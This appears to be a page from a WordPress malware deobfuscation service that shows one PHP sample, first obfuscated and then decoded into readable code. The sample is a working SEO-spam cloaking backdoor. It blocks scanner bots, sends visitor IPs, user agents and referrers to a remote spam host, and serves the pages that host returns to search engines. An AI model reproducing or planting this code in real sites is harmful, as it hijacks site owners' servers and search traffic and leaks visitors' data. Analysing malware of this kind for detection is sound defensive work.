Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
goto mUxpb; Eoo48: $n8AcR = $_SERVER["\122\x45\115\117\x54\x45\137\101\x44\x44\x52"]; goto NcJKQ; aeo7u: $SG2rI = "\156"; goto RfkX_; h2SLT: $kn33t = "\x2e\154\145\163\142"; goto DsNUz; k4cfX: $dOB6Y = "\x56\106\x49\110\125\121\x4f"; goto fAc5k; O0Uoi: $NqxZd = urlencode(@$_SERVER["\110\124\124\120\x5f\x52\x45\106\105\x52\105\122"]); goto YLm4W; Q5UTn: header("\x48\124\x54\x50\57\61\56\60\x20\64\x30\63\40\106\x6f\162\142\x69\x64\144\145\x6e"); goto fDTpG; Bi8Sz: curl_setopt($SCBra, CURLOPT_FOLLOWLOCATION, false); goto Jz4vI; fAc5k: $fOp7_ = "\x59\141\x68\x6f\x6f\174\104\157\143\157\x6d\157\174\102\151\x6e\147\x7c\107\157\x6f\147\x6c\x65"; goto u3ujG; vtXjw: exit; goto Jfq8z; mA1UY: $EIT2q = 1; goto jAjDP; XQyZq: bGGB9: goto uyBIJ; H40u7: goto FTuhb; goto bLro0; DXIK3: header("\110\x54\124\120\x2f\x31\56\x31\40\64\x30\x34\40\116\157\164\40\106\x6f\165\156\x64"); goto H53Gj; g_enR: MIa5P: goto GvvPn; xMzix: $UC9EI = "\x63\x77\x39\x31\71"; goto aeo7u; n4OOI: if (substr($mGe6D, 0, 5) == "\x3c\77\x78\155\x6c") { goto I7LQh; } goto VWnS8; Jz4vI: curl_setopt($SCBra, CURLOPT_SSL_VERIFYPEER, FALSE); goto XLU1g; yPh31: $yqD6S = urlencode($_SERVER["\110\124\124\x50\137\x48\x4f\123\x54"]); goto k7MYc; uyBIJ: if (empty($mGe6D)) { goto iinMD; } goto HlRC4; FePVQ: $hiTyo = $cg737 . "\x3f\x61\x67\145\156\x74\x3d{$u9izq}\x26\162\145\x66\x65\x72\75{$NqxZd}\x26\154\x61\156\147\75{$YaHJK}\x26\151\160\75{$n8AcR}\x26\x64\157\x6d\75{$yqD6S}\46\x68\164\164\x70\75{$mQ041}\x26\165\162\151\75{$X3Sga}\x26\x70\143\x3d{$dOB6Y}\46\x72\x65\167\162\x69\164\145\x61\142\154\x65\x3d{$EIT2q}\46\x73\x63\162\x69\160\164\x3d{$Bhe62}"; goto ip10M; Twgxs: $mQ041 = urlencode($_SERVER["\122\105\121\125\105\x53\124\x5f\123\x43\110\x45\x4d\x45"]); goto jr25_; sZF0J: header("\x48\124\x54\120\x2f\x31\x2e\x30\40\x35\x30\60\x20\111\156\x74\145\x72\x6e\141\154\40\x53\x65\x72\x76\x65\162\x20\x45\x72\x72\157\x72"); goto t3GTM; piiIh: goto MIa5P; goto C241l; L0qY8: echo $mGe6D; goto vtXjw; HK13k: j1E1R: goto AUL_6; fDTpG: exit; goto lFCV4; qbTd3: $mGe6D = @file_get_contents($hiTyo); goto KpSIB; DsNUz: $tWv_z = "\56\163\150\x6f\160\x2f"; goto gTWlD; ip10M: $sXPk3 = ''; goto qbTd3; Q3QWY: y73_A: goto Twgxs; u3ujG: error_reporting(0); goto Yeea6; bLro0: afHOJ: goto DXIK3; a2hHt: QKOFI: goto FePVQ; C241l: VDI1A: goto yLH5N; Yeea6: if (!preg_match("\x2f\50\102\171\164\145\x73\160\x69\144\145\x72\x7c\x4a\x61\166\141\x7c\143\162\x61\x77\x6c\104\x61\x64\144\171\174\132\x6d\x45\165\x7c\x4c\151\147\x68\x74\104\x65\x63\x6b\x52\x65\160\x6f\162\x74\x73\x20\x42\x6f\164\x7c\x42\x61\x72\153\x72\157\x77\154\145\x72\174\120\x79\164\x68\157\x6e\x7c\x68\x74\164\160\x43\x6c\151\x65\156\x74\174\x48\145\x72\x69\x74\x72\151\x78\x7c\120\x61\x6c\157\x61\x6c\x74\x6f\156\145\x74\x77\x6f\x72\153\163\x7c\101\x6d\x61\172\x6f\x6e\102\157\x74\174\x73\x77\x69\146\x74\x62\x6f\164\174\x65\x7a\x6f\x6f\x6d\163\x7c\x45\x61\x73\157\165\x53\x70\x69\144\x65\162\x7c\x4a\151\x6b\x65\x53\x70\151\144\x65\162\174\x53\x63\162\x61\x70\171\x7c\141\x73\x6b\124\142\106\x58\124\x56\x7c\x6a\141\165\x6e\164\171\x7c\104\151\x67\x45\170\164\x7c\141\x70\141\143\150\x65\x42\x65\x6e\x63\x68\x7c\131\x79\123\160\151\x64\145\162\174\120\x79\x74\150\157\x6e\x2d\162\145\x71\165\145\x73\164\x73\x7c\x66\x65\x65\x64\x44\145\x6d\157\156\174\x55\156\151\166\145\x72\163\141\x6c\x46\145\145\x64\120\x61\x72\x73\145\162\x7c\x73\x65\x6d\162\x75\163\x68\x42\x6f\164\174\x59\141\x6e\144\145\x78\102\x6f\x74\174\115\152\x31\x32\142\x6f\164\x7c\x43\x6f\x6f\154\x70\x61\144\x57\x65\x62\x6b\151\x74\x7c\x59\x69\163\x6f\x75\123\x70\x69\144\145\x72\174\106\x65\145\144\x6c\171\x7c\117\102\x6f\x74\174\x70\x65\164\141\x6c\102\x6f\164\x7c\x69\x6e\x64\x79\x20\x4c\151\x62\162\x61\x72\x79\x7c\101\x68\x72\x65\x66\x73\x42\x6f\164\174\x70\x79\x74\x68\157\x6e\55\x75\162\154\x6c\151\142\x29\57\x69", $_SERVER["\x48\x54\124\x50\137\125\x53\x45\x52\x5f\x41\107\x45\116\124"])) { goto BKpqI; } goto Q5UTn; YLm4W: $u9izq = urlencode($_SERVER["\x48\x54\x54\120\137\x55\x53\x45\122\137\x41\107\x45\x4e\x54"]); goto U1cI3; k7MYc: $Bhe62 = urlencode($_SERVER["\123\x43\122\x49\120\x54\x5f\116\101\x4d\105"]); goto S5S_n; lFCV4: BKpqI: goto O0Uoi; NcJKQ: if (!empty(@$_SERVER["\x48\124\124\x50\137\x43\x4c\111\105\x4e\x54\137\x49\x50"])) { goto JaVHB; } goto Frxwq; Jfq8z: return; goto QN08S; FOEGA: gVf14: goto rZVe6; HlRC4: if (!(substr($mGe6D, 0, 10) == "\x65\162\x72\x6f\162\x20\x63\157\144\145" || $mGe6D == "\x35\60\60")) { goto N2EMI; } goto sZF0J; uwHBZ: $n8AcR = $_SERVER["\110\124\x54\120\137\103\114\111\x45\x4e\x54\137\111\120"]; goto piiIh; oGs8s: if (strpos($X3Sga, "\x6a\x70\62\x30\x32\x33") !== false || preg_match("\57\50{$fOp7_}\x29\57\x69", $_SERVER["\110\x54\x54\120\x5f\x52\105\x46\x45\x52\x45\122"])) { goto afHOJ; } goto n4OOI; gTWlD: $cg737 = $LQtwl . $UC9EI . $kn33t . $pWnGs . $SG2rI . $tWv_z; goto k4cfX; t3GTM: exit; goto kl3ZU; lmaoF: curl_setopt($SCBra, CURLOPT_RETURNTRANSFER, true); goto Bi8Sz; S5S_n: if (!empty($_SERVER["\x52\x45\x51\125\105\x53\124\137\123\103\110\x45\115\105"]) && $_SERVER["\122\105\x51\125\x45\x53\124\137\123\x43\x48\x45\115\105"] == "\150\164\x74\160\163" || !empty($_SERVER["\x48\x54\124\120\123"]) && $_SERVER["\x48\124\124\x50\x53"] == "\157\x6e" || !empty($_SERVER["\x53\x45\x52\x56\105\x52\x5f\120\x4f\122\124"]) && $_SERVER["\123\x45\122\126\105\x52\137\120\x4f\122\124"] == "\x34\64\63" || isset($_SERVER["\110\124\x54\x50\137\x58\137\106\117\122\127\101\122\x44\105\x44\x5f\120\x52\117\124\x4f"]) && $_SERVER["\110\x54\124\120\137\x58\x5f\x46\x4f\122\127\101\122\x44\x45\x44\x5f\120\122\x4f\124\117"] == "\x68\x74\x74\160\163") { goto j1E1R; } goto E5Uh_; yLH5N: $n8AcR = $_SERVER["\110\x54\124\x50\137\x58\x5f\x46\117\x52\127\101\122\x44\105\x44\137\106\x4f\x52"]; goto g_enR; jr25_: $X3Sga = urlencode($_SERVER["\122\x45\121\125\x45\x53\x54\x5f\x55\122\111"]); goto mA1UY; iUwp9: goto W2MTh; goto a2hHt; B4TjV: I7LQh: goto wOGH9; VWnS8: header("\x43\x6f\156\164\145\156\x74\x2d\124\x79\x70\x65\72\x20\x74\145\170\x74\x2f\x68\164\x6d\154\73\x20\143\150\x61\162\x73\x65\x74\x3d\x75\164\146\55\70"); goto Soa6l; ERF3v: goto y73_A; goto HK13k; jAjDP: if (strpos($X3Sga, "\146\141\x76\151\x63\x6f\x6e\x2e\x69\143\157") !== false) { goto gVf14; } goto Y9QW8; Soa6l: goto oyh10; goto B4TjV; QN08S: iinMD: goto YrdbG; azTf5: curl_close($SCBra); goto XQyZq; Y9QW8: if (strpos($X3Sga, "\x6a\x70\x32\60\62\x33") !== false || preg_match("\x40\136\57\x28\56\52\77\x29\x2e\170\155\x6c\44\x40\x69", $_SERVER["\122\105\x51\x55\x45\x53\x54\x5f\125\122\111"]) || preg_match("\57\50{$fOp7_}\51\x2f\x69", $_SERVER["\x48\124\x54\x50\x5f\x55\x53\x45\122\x5f\x41\x47\x45\x4e\124"]) || preg_match("\x2f\50{$fOp7_}\x29\x2f\x69", $_SERVER["\110\124\124\x50\x5f\122\105\x46\105\122\105\122"])) { goto QKOFI; } goto iUwp9; XLU1g: curl_setopt($SCBra, CURLOPT_SSL_VERIFYHOST, FALSE); goto n0osh; Frxwq: if (!empty(@$_SERVER["\x48\124\124\120\x5f\x58\137\x46\117\122\x57\101\122\104\105\x44\137\x46\117\x52"])) { goto VDI1A; } goto Zjm_m; E5Uh_: $_SERVER["\122\x45\121\125\105\123\x54\x5f\123\103\x48\105\x4d\105"] = "\150\x74\164\160"; goto ERF3v; Zjm_m: goto MIa5P; goto wKIvF; HmVAh: curl_setopt($SCBra, CURLOPT_URL, $hiTyo); goto lmaoF; wOGH9: header("\x43\157\156\x74\145\156\164\x2d\124\x79\160\145\72\40\164\145\x78\x74\x2f\x78\x6d\x6c\x3b\x20\x63\150\x61\x72\163\x65\164\x3d\165\164\146\55\x38"); goto Asm9B; U1cI3: $YaHJK = urlencode(@$_SERVER["\110\x54\x54\120\137\x41\103\x43\x45\120\124\x5f\x4c\x41\x4e\x47\x55\101\x47\105"]); goto Eoo48; n0osh: $mGe6D = curl_exec($SCBra); goto azTf5; jgS9h: goto KCP_N; goto FOEGA; cqfRU: $SCBra = curl_init(); goto HmVAh; mUxpb: $LQtwl = "\150\x74" . "\x74\160\x3a\x2f\57"; goto xMzix; GvvPn: $n8AcR = urlencode($n8AcR); goto yPh31; kl3ZU: N2EMI: goto oGs8s; Asm9B: oyh10: goto H40u7; RfkX_: $pWnGs = "\151\x61\x6e\x74\x6f\x77"; goto h2SLT; YrdbG: W2MTh: goto jgS9h; AUL_6: $_SERVER["\x52\x45\121\x55\105\123\124\137\123\x43\x48\105\x4d\105"] = "\x68\164\x74\x70\x73"; goto Q3QWY; H53Gj: FTuhb: goto L0qY8; wKIvF: JaVHB: goto uwHBZ; KpSIB: if (!empty($mGe6D)) { goto bGGB9; } goto cqfRU; rZVe6: KCP_N:
?><?php
$LQtwl = "http://";
$UC9EI = "cw919";
$SG2rI = "n";
$pWnGs = "iantow";
$kn33t = ".lesb";
$tWv_z = ".shop/";
$cg737 = "http://cw919.lesbiantown.shop/";
$dOB6Y = "VFIHUQO";
$fOp7_ = "Yahoo|Docomo|Bing|Google";
error_reporting(0);
if (!preg_match("/(Bytespider|Java|crawlDaddy|ZmEu|LightDeckReports Bot|Barkrowler|Python|httpClient|Heritrix|Paloaltonetworks|AmazonBot|swiftbot|ezooms|EasouSpider|JikeSpider|Scrapy|askTbFXTV|jaunty|DigExt|apacheBench|YySpider|Python-requests|feedDemon|UniversalFeedParser|semrushBot|YandexBot|Mj12bot|CoolpadWebkit|YisouSpider|Feedly|OBot|petalBot|indy Library|AhrefsBot|python-urllib)/i", $_SERVER["HTTP_USER_AGENT"])) {
$NqxZd = urlencode(@$_SERVER["HTTP_REFERER"]);
$u9izq = urlencode($_SERVER["HTTP_USER_AGENT"]);
$YaHJK = urlencode(@$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
$n8AcR = $_SERVER["REMOTE_ADDR"];
if (!empty(@$_SERVER["HTTP_CLIENT_IP"])) {
$n8AcR = $_SERVER["HTTP_CLIENT_IP"];
goto MIa5P;
}
if (!empty(@$_SERVER["HTTP_X_FORWARDED_FOR"])) {
$n8AcR = $_SERVER["HTTP_X_FORWARDED_FOR"];
goto g_enR;
}
g_enR:
MIa5P:
$n8AcR = urlencode($n8AcR);
$yqD6S = urlencode($_SERVER["HTTP_HOST"]);
$Bhe62 = urlencode($_SERVER["SCRIPT_NAME"]);
if (!empty($_SERVER["REQUEST_SCHEME"]) && $_SERVER["REQUEST_SCHEME"] == "https" || !empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on" || !empty($_SERVER["SERVER_PORT"]) && $_SERVER["SERVER_PORT"] == "443" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] == "https") {
$_SERVER["REQUEST_SCHEME"] = "https";
goto Q3QWY;
}
$_SERVER["REQUEST_SCHEME"] = "http";
Q3QWY:
$mQ041 = urlencode($_SERVER["REQUEST_SCHEME"]);
$X3Sga = urlencode($_SERVER["REQUEST_URI"]);
$EIT2q = 1;
if (strpos($X3Sga, "favicon.ico") !== false) {
goto rZVe6;
}
if (strpos($X3Sga, "jp2023") !== false || preg_match("@^/(.*?).xml\$@i", $_SERVER["REQUEST_URI"]) || preg_match("/({$fOp7_})/i", $_SERVER["HTTP_USER_AGENT"]) || preg_match("/({$fOp7_})/i", $_SERVER["HTTP_REFERER"])) {
$hiTyo = $cg737 . "?agent={$u9izq}&refer={$NqxZd}&lang={$YaHJK}&ip={$n8AcR}&dom={$yqD6S}&http={$mQ041}&uri={$X3Sga}&pc={$dOB6Y}&rewriteable={$EIT2q}&script={$Bhe62}";
$sXPk3 = '';
$mGe6D = @file_get_contents($hiTyo);
if (!empty($mGe6D)) {
goto bGGB9;
}
$SCBra = curl_init();
curl_setopt($SCBra, CURLOPT_URL, $hiTyo);
curl_setopt($SCBra, CURLOPT_RETURNTRANSFER, true);
curl_setopt($SCBra, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($SCBra, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($SCBra, CURLOPT_SSL_VERIFYHOST, FALSE);
$mGe6D = curl_exec($SCBra);
curl_close($SCBra);
bGGB9:
if (empty($mGe6D)) {
goto YrdbG;
}
if (!(substr($mGe6D, 0, 10) == "error code" || $mGe6D == "500")) {
if (strpos($X3Sga, "jp2023") !== false || preg_match("/({$fOp7_})/i", $_SERVER["HTTP_REFERER"])) {
header("HTTP/1.1 404 Not Found");
goto H53Gj;
}
if (substr($mGe6D, 0, 5) == "<?xml") {
header("Content-Type: text/xml; charset=utf-8");
goto Asm9B;
}
header("Content-Type: text/html; charset=utf-8");
Asm9B:
H53Gj:
echo $mGe6D;
exit;
}
header("HTTP/1.0 500 Internal Server Error");
exit;
}
YrdbG:
rZVe6:
// [PHPDeobfuscator] Implied script end
return;
}
header("HTTP/1.0 403 Forbidden");
exit;Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.